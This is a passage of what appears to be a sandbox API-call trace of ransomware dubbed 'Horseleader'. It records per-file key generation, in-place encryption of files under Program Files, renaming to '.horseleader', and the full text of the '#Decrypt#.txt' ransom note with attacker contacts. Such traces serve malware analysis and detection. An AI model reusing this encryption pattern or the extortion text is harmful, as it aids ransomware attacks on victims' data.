cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM.horseleader") returned 83 [0247.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm.horseleader")) returned 1 [0247.910] GetProcessHeap () returned 0x780000 [0247.910] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.910] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a980590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SKY.INF", cAlternateFileName="")) returned 1 [0247.910] lstrcmpiW (lpString1="SKY.INF", lpString2="Windows") returned -1 [0247.910] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0247.910] StrStrIW (lpFirst="SKY.INF", lpSrch=".horseleader") returned 0x0 [0247.910] lstrcmpW (lpString1="SKY.INF", lpString2="#Decrypt#.txt") returned 1 [0247.910] lstrcmpW (lpString1="SKY.INF", lpString2="_uninstalling_.png") returned 1 [0247.910] lstrlenW (lpString=".testttjffg") returned 11 [0247.910] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF", lpSrch=".testttjffg") returned 0x0 [0247.910] CryptGenRandom 
(in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0247.911] StrStrW (lpFirst="SKY.INF", lpSrch=".txt") returned 0x0 [0247.911] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=444) returned 1 [0247.911] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1bc, lpOverlapped=0x0) returned 1 [0247.913] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.913] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1bc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1bc, lpOverlapped=0x0) returned 1 [0247.913] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.913] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.913] 
WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.914] CloseHandle (hObject=0x1a4) returned 1 [0247.914] GetProcessHeap () returned 0x780000 [0247.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.914] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF.horseleader") returned 83 [0247.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.inf.horseleader")) returned 1 [0247.917] GetProcessHeap () returned 0x780000 [0247.917] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.917] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7279, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.917] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.917] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 
[0247.917] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.917] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.917] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.918] lstrlenW (lpString=".testttjffg") returned 11 [0247.918] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.918] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.918] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 [0247.919] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.919] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=29305) returned 1 [0247.919] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.922] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.922] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2279, lpOverlapped=0x0) returned 1 [0247.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.922] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2279, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2279, lpOverlapped=0x0) returned 1 [0247.923] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.923] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.923] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.923] CloseHandle (hObject=0x1a4) returned 1 [0247.923] GetProcessHeap () returned 0x780000 [0247.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.923] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.horseleader") returned 88 [0247.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.horseleader")) returned 1 [0247.924] GetProcessHeap () returned 0x780000 [0247.924] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.924] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7279, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.924] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.924] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\#Decrypt#.txt") returned 77 [0247.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.925] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.925] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.927] lstrlenA (lpString="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") returned 1368 [0247.927] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.927] CloseHandle (hObject=0x158) returned 1 [0247.927] GetProcessHeap () returned 0x780000 [0247.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.927] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SLATE", cAlternateFileName="")) returned 1 [0247.927] lstrcmpiW (lpString1="SLATE", lpString2="Windows") returned -1 [0247.927] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned 65 [0247.927] lstrcmpW (lpString1="SLATE", lpString2=".") returned 1 [0247.927] lstrcmpW (lpString1="SLATE", lpString2="..") returned 1 [0247.927] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.927] GetProcessHeap () returned 0x780000 [0247.927] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.927] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*") returned 67 [0247.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.932] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.932] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\.") returned 67 [0247.932] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.932] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.932] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\..") returned 68 [0247.932] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.932] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0247.932] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.932] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.933] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 77 [0247.933] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.933] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.933] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.933] lstrlenW (lpString=".testttjffg") returned 11 [0247.933] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.933] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.933] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x1a4 [0247.948] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 77 [0247.948] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.948] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1009) returned 1 [0247.949] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3f1, lpOverlapped=0x0) returned 1 [0247.951] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.951] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3f1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3f1, lpOverlapped=0x0) returned 1 [0247.951] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.951] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.952] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.952] CloseHandle (hObject=0x1a4) returned 1 [0247.952] GetProcessHeap () returned 0x780000 [0247.952] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.952] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.horseleader") returned 89 [0247.952] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.horseleader")) returned 1 [0247.953] GetProcessHeap () returned 0x780000 [0247.953] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.953] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27222c00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x27222c00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SLATE.ELM", cAlternateFileName="")) returned 1 [0247.954] lstrcmpiW (lpString1="SLATE.ELM", lpString2="Windows") returned -1 [0247.954] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM") returned 75 [0247.954] StrStrIW (lpFirst="SLATE.ELM", lpSrch=".horseleader") returned 0x0 [0247.954] lstrcmpW (lpString1="SLATE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.954] lstrcmpW (lpString1="SLATE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.954] lstrlenW (lpString=".testttjffg") returned 11 [0247.954] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.954] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.954] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\slate.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM") returned 75 [0247.955] StrStrW (lpFirst="SLATE.ELM", lpSrch=".txt") returned 0x0 [0247.955] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=85056) returned 1 [0247.955] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.955] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.958] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.958] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.959] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x7e20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.959] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, 
